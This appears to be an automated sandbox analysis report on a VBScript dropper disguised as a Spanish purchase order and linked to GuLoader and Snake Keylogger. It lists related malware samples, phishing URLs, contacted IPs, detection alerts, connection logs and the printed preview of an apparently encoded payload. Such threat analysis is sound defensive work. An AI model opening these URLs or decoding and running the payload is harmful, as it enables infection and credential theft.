                                                                            https://www.google.co.nz/url?q=nL206935ZEtyvV206935l&sa=t&url=amp/%69%70%66%6F%78%2E%63%6F%2E%75%6B%2F%70%61%67%65%73%2F%74%68%61%6E%6B%73%2E%68%74%6D%6C#cnlhbi5zcGVuY2VyQHVzLnlhemFraS5jb20=Get hashmaliciousHTMLPhisherBrowse
                                                                            • 149.154.167.220
                                                                            NEW ORDER QUOTATION REQUEST.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • 149.154.167.220
                                                                            s-part-0044.t-0009.fb-t-msedge.nethttps://email.email.pandadoc.net/c/eJxUkE9r4zwQxj-NdUuQR5ItHXQobfwG3rLQsmHbXspIGjeqE8m1FYfm0y-B7f65DcP8ht_zBOsa4XrNQvanI6XyGoPN-f7_7ilGN8iYdk8Pn-dxt_vOyNYtmMZwDpztLRpXK45GaGy9C943vK2NJgTDG-WQRQscZM1B1AJaztfS904pGYLuOTQtVZLTEeNhPWIKGLJfJyoszq9lQk_oDmTLdCJ2sPtSxrkSNxV0FXQ4jn8Qn48VdF_6FXQLVKIreaBUiTvSzgiJNQeJqLDhSoJpBAanJYFWrZO1kb6uRMdSLrGPHkvM6VqDaxuBBtpVCyBWEkW9wkbTCsko1-galQ4sT2-Y4uU39N85y5jEfDMn83C50P6beDlv2WTDe040V5K702Ggj9NhvKqziZY4_2J_iM3H6W67XV7Uop9j2dyq0D-yYr_S_TWuCk5v9M9mvl4sFtg5T8M8oqfrU_W4od1nvwdHIdy798HfDs_6ZwAAAP__1K2kLgGet hashmaliciousUnknownBrowse
                                                                            • 13.107.253.72
                                                                            69-33-600 Kreiselkammer ER3.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                            • 13.107.253.72
                                                                            7y29L6liwm.dllGet hashmaliciousStrela StealerBrowse
                                                                            • 13.107.253.72
                                                                            igCCUqSW2T.exeGet hashmaliciousUnknownBrowse
                                                                            • 13.107.253.72
                                                                            tfduJDS9iM.exeGet hashmaliciousUnknownBrowse
                                                                            • 13.107.253.72
                                                                            KO8mPIAMHh.exeGet hashmaliciousUnknownBrowse
                                                                            • 13.107.253.72
                                                                            https://api-restauration.basiic.net/fWmcv/Get hashmaliciousUnknownBrowse
                                                                            • 13.107.253.72
                                                                            https://re.e-sharedonedrivefile.com/skjashdGet hashmaliciousUnknownBrowse
                                                                            • 13.107.253.72
                                                                            https://app.creatopy.com/share/d/qvnqyxdo8o7mGet hashmaliciousUnknownBrowse
                                                                            • 13.107.253.72
                                                                            17296647828551b11aca9b151564721554cb3198cad41fe09df6ef699a89a6a1e471ca1e8b529.dat-decoded.exeGet hashmaliciousLummaCBrowse
                                                                            • 13.107.253.72
                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            ORACLE-BMC-31898USPedido de Cota#U00e7#U00e3o-24100004_lista comercial.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                            • 193.122.130.0
                                                                            rp8s2rxD5lpuQAG.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                            • 193.122.130.0
                                                                            InvoiceXCopy.xlsGet hashmaliciousSnake KeyloggerBrowse
                                                                            • 158.101.44.242
                                                                            Pedido urgente_pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                            • 193.122.130.0
                                                                            Ziraat Bankasi Swift Mesaji,pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • 193.122.6.168
                                                                            AmountXpayable.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • 193.122.6.168
                                                                            CLOSURE.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • 158.101.44.242
                                                                            REVISED INVOICE.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • 193.122.6.168
                                                                            Inquiry N_ TM23-10-00.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • 193.122.6.168
                                                                            greatthingswithgreatideasgivenmerestthignstgood.htaGet hashmaliciousCobalt Strike, Snake KeyloggerBrowse
                                                                            • 193.122.130.0
                                                                            TELEGRAMRUPedido de Cota#U00e7#U00e3o-24100004_lista comercial.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                            • 149.154.167.220
                                                                            eFo07GvEf0.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • 149.154.167.220
                                                                            Ziraat Bankasi Swift Mesaji,pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • 149.154.167.220
                                                                            AmountXpayable.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • 149.154.167.220
                                                                            FINAL SHIPPING DOCS.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                            • 149.154.167.220
                                                                            CLOSURE.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • 149.154.167.220
                                                                            REVISED INVOICE.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • 149.154.167.220
                                                                            Inquiry N_ TM23-10-00.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • 149.154.167.220
                                                                            7ZthFNAqYp.exeGet hashmaliciousVidarBrowse
                                                                            • 149.154.167.99
                                                                            https://www.google.co.nz/url?q=nL206935ZEtyvV206935l&sa=t&url=amp/%69%70%66%6F%78%2E%63%6F%2E%75%6B%2F%70%61%67%65%73%2F%74%68%61%6E%6B%73%2E%68%74%6D%6C#cnlhbi5zcGVuY2VyQHVzLnlhemFraS5jb20=Get hashmaliciousHTMLPhisherBrowse
                                                                            • 149.154.167.220
                                                                            CLOUDFLARENETUSLlbpXphTu9.exeGet hashmaliciousUnknownBrowse
                                                                            • 104.21.3.193
                                                                            Pedido de Cota#U00e7#U00e3o-24100004_lista comercial.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                            • 188.114.96.3
                                                                            https://email.email.pandadoc.net/c/eJxUkE9r4zwQxj-NdUuQR5ItHXQobfwG3rLQsmHbXspIGjeqE8m1FYfm0y-B7f65DcP8ht_zBOsa4XrNQvanI6XyGoPN-f7_7ilGN8iYdk8Pn-dxt_vOyNYtmMZwDpztLRpXK45GaGy9C943vK2NJgTDG-WQRQscZM1B1AJaztfS904pGYLuOTQtVZLTEeNhPWIKGLJfJyoszq9lQk_oDmTLdCJ2sPtSxrkSNxV0FXQ4jn8Qn48VdF_6FXQLVKIreaBUiTvSzgiJNQeJqLDhSoJpBAanJYFWrZO1kb6uRMdSLrGPHkvM6VqDaxuBBtpVCyBWEkW9wkbTCsko1-galQ4sT2-Y4uU39N85y5jEfDMn83C50P6beDlv2WTDe040V5K702Ggj9NhvKqziZY4_2J_iM3H6W67XV7Uop9j2dyq0D-yYr_S_TWuCk5v9M9mvl4sFtg5T8M8oqfrU_W4od1nvwdHIdy798HfDs_6ZwAAAP__1K2kLgGet hashmaliciousUnknownBrowse
                                                                            • 104.16.117.116
                                                                            044SqLy1H3.exeGet hashmaliciousLummaCBrowse
                                                                            • 188.114.97.3
                                                                            sample.pdfGet hashmaliciousHtmlDropperBrowse
                                                                            • 104.21.65.137
                                                                            https://email.email.pandadoc.net/c/eJxUkMtu2zoQhp9G3NkQhxQlLbRIjo8QpKjRS5qi3QTD4TCmZYuyRNm1nr4w0PSyGwzmG3z_7xprlPWVcJHmI_fpJbjmguOnLn78cm0vTw-4fw8_dttdENzIEmoji9oYsWsAtST2VKmiVOSoJqdyVNYa9pUnKUIDOWiZA0hTgDZrUNoXnphIopaly3TORwyH9YC9Qxdp3XMSYXpJIxKjPXCTxpnFodmlNEyZusugzaDFYfiDUDxm0L7pZ9CeIVNtih33mdpIlF4hGzaGIM8ta2mV83UNlbFYlJCbQhsoM9WKPqbgA2EKsb_VACXX1jKtlM9hpQHcqiKvVsZXuvB16WTBIo6v2IflN7T_8Ly_7-p6G_bz4wbM8n1Sp6MYG7ePPU-Zzu186Pg0H4abuhj5HKZfrF4mPLvT5vndMpR0h183E0MpUvOW7q9xlXB85X820-3i3IC4xLGbBiS-Pf3v-o2eUuge_l-21bG_2vt-fvz8MwAA__9XraZ6Get hashmaliciousUnknownBrowse
                                                                            • 104.16.117.116
                                                                            wRcmIT6Eji.exeGet hashmaliciousLummaCBrowse
                                                                            • 188.114.97.3
                                                                            qfq0JTpoq9.exeGet hashmaliciousLummaCBrowse
                                                                            • 188.114.97.3
                                                                            http://docusign.netGet hashmaliciousUnknownBrowse
                                                                            • 104.18.66.57
                                                                            W1WowSI1iG.exeGet hashmaliciousLummaCBrowse
                                                                            • 188.114.97.3
                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            54328bd36c14bd82ddaa0c04b25ed9adPedido de Cota#U00e7#U00e3o-24100004_lista comercial.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                            • 188.114.96.3
                                                                            rp8s2rxD5lpuQAG.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                            • 188.114.96.3
                                                                            eFo07GvEf0.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • 188.114.96.3
                                                                            Pedido urgente_pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                            • 188.114.96.3
                                                                            Ziraat Bankasi Swift Mesaji,pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • 188.114.96.3
                                                                            AmountXpayable.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • 188.114.96.3
                                                                            FINAL SHIPPING DOCS.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                            • 188.114.96.3
                                                                            REVISED INVOICE.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • 188.114.96.3
                                                                            Inquiry N_ TM23-10-00.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • 188.114.96.3
                                                                            41570002689_20220814_05352297_HesapOzeti.exeGet hashmaliciousMassLogger RATBrowse
                                                                            • 188.114.96.3
                                                                            3b5074b1b5d032e5620f69f9f700ff0ePedido de Cota#U00e7#U00e3o-24100004_lista comercial.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                            • 149.154.167.220
                                                                            • 142.250.185.206
                                                                            • 142.250.185.65
                                                                            69-33-600 Kreiselkammer ER3.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                            • 149.154.167.220
                                                                            • 142.250.185.206
                                                                            • 142.250.185.65
                                                                            PO 202410-224.vbsGet hashmaliciousUnknownBrowse
                                                                            • 149.154.167.220
                                                                            • 142.250.185.206
                                                                            • 142.250.185.65
                                                                            https://email.email.pandadoc.net/c/eJxUkMtu2zoQhp9G3NkQhxQlLbRIjo8QpKjRS5qi3QTD4TCmZYuyRNm1nr4w0PSyGwzmG3z_7xprlPWVcJHmI_fpJbjmguOnLn78cm0vTw-4fw8_dttdENzIEmoji9oYsWsAtST2VKmiVOSoJqdyVNYa9pUnKUIDOWiZA0hTgDZrUNoXnphIopaly3TORwyH9YC9Qxdp3XMSYXpJIxKjPXCTxpnFodmlNEyZusugzaDFYfiDUDxm0L7pZ9CeIVNtih33mdpIlF4hGzaGIM8ta2mV83UNlbFYlJCbQhsoM9WKPqbgA2EKsb_VACXX1jKtlM9hpQHcqiKvVsZXuvB16WTBIo6v2IflN7T_8Ly_7-p6G_bz4wbM8n1Sp6MYG7ePPU-Zzu186Pg0H4abuhj5HKZfrF4mPLvT5vndMpR0h183E0MpUvOW7q9xlXB85X820-3i3IC4xLGbBiS-Pf3v-o2eUuge_l-21bG_2vt-fvz8MwAA__9XraZ6Get hashmaliciousUnknownBrowse
                                                                            • 149.154.167.220
                                                                            • 142.250.185.206
                                                                            • 142.250.185.65
                                                                            http://docusign.netGet hashmaliciousUnknownBrowse
                                                                            • 149.154.167.220
                                                                            • 142.250.185.206
                                                                            • 142.250.185.65
                                                                            https://c4hbh789.caspio.com/dp/32a4e0002a1934bee62047dd94d1Get hashmaliciousUnknownBrowse
                                                                            • 149.154.167.220
                                                                            • 142.250.185.206
                                                                            • 142.250.185.65
                                                                            http://wxqlb.ecobusinessegypt.com/4Upeae17759oIun1207nsacmhsouq29959VLTMIPDLABHITRZ3224VGST20749x12Get hashmaliciousUnknownBrowse
                                                                            • 149.154.167.220
                                                                            • 142.250.185.206
                                                                            • 142.250.185.65
                                                                            FvmhkYIi5P.exeGet hashmaliciousUnknownBrowse
                                                                            • 149.154.167.220
                                                                            • 142.250.185.206
                                                                            • 142.250.185.65
                                                                            FvmhkYIi5P.exeGet hashmaliciousUnknownBrowse
                                                                            • 149.154.167.220
                                                                            • 142.250.185.206
                                                                            • 142.250.185.65
                                                                            https://asfdhjgd16dfhfgkfsgdssd.z33.web.core.windows.net/asfdsa16.htmlGet hashmaliciousTechSupportScamBrowse
                                                                            • 149.154.167.220
                                                                            • 142.250.185.206
                                                                            • 142.250.185.65
                                                                            37f463bf4616ecd445d4a1937da06e19Pedido de Cota#U00e7#U00e3o-24100004_lista comercial.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                            • 142.250.185.206
                                                                            • 142.250.185.65
                                                                            69-33-600 Kreiselkammer ER3.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                            • 142.250.185.206
                                                                            • 142.250.185.65
                                                                            xxJfSec58P.exeGet hashmaliciousVidarBrowse
                                                                            • 142.250.185.206
                                                                            • 142.250.185.65
                                                                            UMrFwHyjUi.exeGet hashmaliciousVidarBrowse
                                                                            • 142.250.185.206
                                                                            • 142.250.185.65
                                                                            b157p9L0c1.exeGet hashmaliciousVidarBrowse
                                                                            • 142.250.185.206
                                                                            • 142.250.185.65
                                                                            PFlJLzFUqH.exeGet hashmaliciousVidarBrowse
                                                                            • 142.250.185.206
                                                                            • 142.250.185.65
                                                                            46QSz6qyKC.exeGet hashmaliciousVidarBrowse
                                                                            • 142.250.185.206
                                                                            • 142.250.185.65
                                                                            rMactation.exeGet hashmaliciousGuLoaderBrowse
                                                                            • 142.250.185.206
                                                                            • 142.250.185.65
                                                                            rMactation.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                            • 142.250.185.206
                                                                            • 142.250.185.65
                                                                            X2lvDxMUmn.exeGet hashmaliciousStealc, VidarBrowse
                                                                            • 142.250.185.206
                                                                            • 142.250.185.65
                                                                            No context
                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:data
                                                                            Category:modified
                                                                            Size (bytes):8003
                                                                            Entropy (8bit):4.840877972214509
                                                                            Encrypted:false
                                                                            SSDEEP:192:Dxoe5HVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9smzdcU6CDQpOR:J1VoGIpN6KQkj2qkjh4iUx5Uib4J
                                                                            MD5:106D01F562D751E62B702803895E93E0
                                                                            SHA1:CBF19C2392BDFA8C2209F8534616CCA08EE01A92
                                                                            SHA-256:6DBF75E0DB28A4164DB191AD3FBE37D143521D4D08C6A9CEA4596A2E0988739D
                                                                            SHA-512:81249432A532959026E301781466650DFA1B282D05C33E27D0135C0B5FD0F54E0AEEADA412B7E461D95A25D43750F802DE3D6878EF0B3E4AB39CC982279F4872
                                                                            Malicious:false
                                                                            Reputation:moderate, very likely benign file
                                                                            Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):64
                                                                            Entropy (8bit):1.1940658735648508
                                                                            Encrypted:false
                                                                            SSDEEP:3:Nlllultnxj:NllU
                                                                            MD5:F93358E626551B46E6ED5A0A9D29BD51
                                                                            SHA1:9AECA90CCBFD1BEC2649D66DF8EBE64C13BACF03
                                                                            SHA-256:0347D1DE5FEA380ADFD61737ECD6068CB69FC466AC9C77F3056275D5FCAFDC0D
                                                                            SHA-512:D609B72F20BF726FD14D3F2EE91CCFB2A281FAD6BC88C083BFF7FCD177D2E59613E7E4E086DB73037E2B0B8702007C8F7524259D109AF64942F3E60BFCC49853
                                                                            Malicious:false
                                                                            Reputation:moderate, very likely benign file
                                                                            Preview:@...e................................................@..........
                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):60
                                                                            Entropy (8bit):4.038920595031593
                                                                            Encrypted:false
                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                            Malicious:false
                                                                            Reputation:high, very likely benign file
                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):60
                                                                            Entropy (8bit):4.038920595031593
                                                                            Encrypted:false
                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                            Malicious:false
                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):60
                                                                            Entropy (8bit):4.038920595031593
                                                                            Encrypted:false
                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                            Malicious:false
                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):60
                                                                            Entropy (8bit):4.038920595031593
                                                                            Encrypted:false
                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                            Malicious:false
                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):475152
                                                                            Entropy (8bit):5.95493854801058
                                                                            Encrypted:false
                                                                            SSDEEP:12288:oQClYe+BzomYTAmiZHqvgLCAtpYpRqsNj0E3pv+38c:LClYeWzWUm+JpYzDQE3U8c
                                                                            MD5:D43327229CAAC3F1C1C7443675EAA345
                                                                            SHA1:169D456A6122E6A39603F3017EB16DF162ACA251
                                                                            SHA-256:0144E44B033690C4D3387D5125A5A76003D371CA48116A53D1439F83D6B530D3
                                                                            SHA-512:DA4CDB914C5618CA83F4F97BF28D89899BC9459FF797B6F865488A7F446B56CEA77BBE37AEB2E89FB81937B6FA1929A2E6C9FECA5FA2EE32344F21E0DFF3A10D
                                                                            Malicious:false
                                                                            Preview:6wJKdOsCao27iQARAHEBm3EBmwNcJATrAkE8cQGbuaUFE+DrAuA76wLAZYHxStqEX+sCap5xAZuB6e/fl7/rAgyM6wI56OsCK3ZxAZu6TUVrVXEBm3EBm+sCWYdxAZsxyusCR+zrAm9GiRQL6wIoCusCQZ3R4usCEllxAZuDwQTrAq4FcQGbgfk30hwFfMnrAvl06wKiGotEJARxAZtxAZuJw+sCBVdxAZuBw7EBXADrAhNf6wLQQ7qapHNm6wKSp+sChYaB8inTvkXrAnkTcQGbgfKzd80jcQGbcQGbcQGbcQGbcQGbcQGbiwwQ6wJC2OsCyWuJDBPrAtpZcQGbQnEBm3EBm4H6dPMEAHXWcQGbcQGbiVwkDOsC/7FxAZuB7QADAADrAjVzcQGbi1QkCOsCwMZxAZuLfCQEcQGbcQGbietxAZvrAuHOgcOcAAAAcQGb6wIfKFNxAZvrAtArakBxAZtxAZuJ6+sC6sLrAtRzx4MAAQAAAOAwBXEBm3EBm4HDAAEAAHEBm3EBm1PrAlbwcQGbievrArsIcQGbibsEAQAAcQGb6wKEYIHDBAEAAHEBm3EBm1PrAnHF6wI+/Gr/cQGb6wLNfoPCBesC0/TrAs3hMfZxAZtxAZsxyesCCLjrAsUaixpxAZtxAZtB6wIczesCDGk5HAp18usCTN/rAmmzRusCr7ZxAZuAfAr7uHXbcQGbcQGbi0QK/HEBm3EBmynw6wJjNHEBm//ScQGb6wIx87p08wQAcQGb6wLjazHAcQGbcQGbi3wkDOsCHHVxAZuBNAeYEm+V6wLUvXEBm4PABHEBm3EBmznQdeXrAj3r6wIVe4n7cQGbcQGb/9dxAZtxAZtwEm+VmEnub3Za5IoR96jQAJSFIdKTGg1Yj3yvGVf3wkfrqhTtivLAOSQjatWKGm/Nm4rzHdPWeGQbfRRpI/8qK0PWbpgSbxRhVgB0yx3iHnkWb8wZ42nyRGXGE1cqARRZLJsAseSs
                                                                            File type:ASCII text, with CRLF line terminators
                                                                            Entropy (8bit):4.859408857159323
                                                                            TrID:
                                                                            • Visual Basic Script (13500/0) 100.00%
                                                                            File name:Distribuciones Enelca Ja#U00e9n, S.L. PEDIDO 456799.vbs
                                                                            File size:541'806 bytes
                                                                            MD5:3f13eef87515d70fbdfedc6de7b6efc4
                                                                            SHA1:8d2394c2e4daada6b8d9af1b60d8d11130ac1845
                                                                            SHA256:a2ef6e1f58a00b5d6523987df95a7ffc052a89470f97cd228a14fbccff113237
                                                                            SHA512:585541e886e8175def7f0e4d92c2ad39c065f8777a113c8738a2aaade3dc96592572265f1e3511718dcdd0703730d530fa13b88c4773ecd2a2ef181c5886de7a
                                                                            SSDEEP:6144:o0/75XG/Kk33JliXA0PsaaBBWiQP88BNkmxylnwa4j3Ms/+UrJ/WzukhWwP+m55k:BNU3/G6PQU8/xCnv4Y4lWzCwPHtvP9Dg
                                                                            TLSH:B7B44B76DE28061A0E5A3799FDC4AFE2D5BCC106462705F1FED8074D600A9ACE7FE219
                                                                            File Content Preview:Function Unrecuperativeness(Prelaticallypipkin,Steeperspremultiplicati)....Kapitalforsikrin = String(95,"I") ....If Steeperspremultiplicati = "Acquaint75" Then ....desalinizingbre = FormatDateTime("8/8/8")....End If..End Function ..Sub trompetisters(Forla
                                                                            Icon Hash:68d69b8f86ab9a86
                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                            2024-10-23T17:23:44.455140+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.1049970142.250.185.206443TCP
                                                                            2024-10-23T17:23:50.053333+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.1049979193.122.6.16880TCP
                                                                            2024-10-23T17:23:52.053083+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.1049979193.122.6.16880TCP
                                                                            2024-10-23T17:23:52.764154+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.1049981188.114.96.3443TCP
                                                                            2024-10-23T17:23:53.756217+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.1049982193.122.6.16880TCP
                                                                            2024-10-23T17:23:54.408561+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.1049983188.114.96.3443TCP
                                                                            2024-10-23T17:23:57.816069+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.1049987188.114.96.3443TCP
                                                                            2024-10-23T17:24:01.095815+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.1049991188.114.96.3443TCP
                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                            Oct 23, 2024 17:22:59.398474932 CEST49740443192.168.2.10142.250.185.206
                                                                            Oct 23, 2024 17:22:59.398538113 CEST44349740142.250.185.206192.168.2.10
                                                                            Oct 23, 2024 17:22:59.398629904 CEST49740443192.168.2.10142.250.185.206
                                                                            Oct 23, 2024 17:22:59.404934883 CEST49740443192.168.2.10142.250.185.206
                                                                            Oct 23, 2024 17:22:59.404958010 CEST44349740142.250.185.206192.168.2.10
                                                                            Oct 23, 2024 17:23:00.276833057 CEST44349740142.250.185.206192.168.2.10
                                                                            Oct 23, 2024 17:23:00.276915073 CEST49740443192.168.2.10142.250.185.206
                                                                            Oct 23, 2024 17:23:00.277919054 CEST44349740142.250.185.206192.168.2.10
                                                                            Oct 23, 2024 17:23:00.277980089 CEST49740443192.168.2.10142.250.185.206
                                                                            Oct 23, 2024 17:23:00.281166077 CEST49740443192.168.2.10142.250.185.206
                                                                            Oct 23, 2024 17:23:00.281179905 CEST44349740142.250.185.206192.168.2.10
                                                                            Oct 23, 2024 17:23:00.281507015 CEST44349740142.250.185.206192.168.2.10
                                                                            Oct 23, 2024 17:23:00.288161993 CEST49740443192.168.2.10142.250.185.206
                                                                            Oct 23, 2024 17:23:00.331336021 CEST44349740142.250.185.206192.168.2.10
                                                                            Oct 23, 2024 17:23:00.655494928 CEST44349740142.250.185.206192.168.2.10
                                                                            Oct 23, 2024 17:23:00.655760050 CEST49740443192.168.2.10142.250.185.206
                                                                            Oct 23, 2024 17:23:00.660737991 CEST49740443192.168.2.10142.250.185.206
                                                                            Oct 23, 2024 17:23:00.660821915 CEST44349740142.250.185.206192.168.2.10
                                                                            Oct 23, 2024 17:23:00.660900116 CEST49740443192.168.2.10142.250.185.206
                                                                            Oct 23, 2024 17:23:00.671679974 CEST49746443192.168.2.10142.250.185.65
                                                                            Oct 23, 2024 17:23:00.671716928 CEST44349746142.250.185.65192.168.2.10
                                                                            Oct 23, 2024 17:23:00.671787977 CEST49746443192.168.2.10142.250.185.65
                                                                            Oct 23, 2024 17:23:00.672035933 CEST49746443192.168.2.10142.250.185.65
                                                                            Oct 23, 2024 17:23:00.672050953 CEST44349746142.250.185.65192.168.2.10
                                                                            Oct 23, 2024 17:23:01.535089016 CEST44349746142.250.185.65192.168.2.10
                                                                            Oct 23, 2024 17:23:01.535275936 CEST49746443192.168.2.10142.250.185.65
                                                                            Oct 23, 2024 17:23:01.537609100 CEST49746443192.168.2.10142.250.185.65
                                                                            Oct 23, 2024 17:23:01.537631035 CEST44349746142.250.185.65192.168.2.10
                                                                            Oct 23, 2024 17:23:01.537918091 CEST44349746142.250.185.65192.168.2.10
                                                                            Oct 23, 2024 17:23:01.538939953 CEST49746443192.168.2.10142.250.185.65
                                                                            Oct 23, 2024 17:23:01.583342075 CEST44349746142.250.185.65192.168.2.10
                                                                            Oct 23, 2024 17:23:03.761437893 CEST44349746142.250.185.65192.168.2.10
                                                                            Oct 23, 2024 17:23:03.761519909 CEST49746443192.168.2.10142.250.185.65
                                                                            Oct 23, 2024 17:23:03.769639015 CEST44349746142.250.185.65192.168.2.10
                                                                            Oct 23, 2024 17:23:03.769709110 CEST49746443192.168.2.10142.250.185.65
                                                                            Oct 23, 2024 17:23:03.880398035 CEST44349746142.250.185.65192.168.2.10
                                                                            Oct 23, 2024 17:23:03.880465031 CEST44349746142.250.185.65192.168.2.10
                                                                            Oct 23, 2024 17:23:03.880481005 CEST49746443192.168.2.10142.250.185.65
                                                                            Oct 23, 2024 17:23:03.880508900 CEST44349746142.250.185.65192.168.2.10
                                                                            Oct 23, 2024 17:23:03.880551100 CEST49746443192.168.2.10142.250.185.65
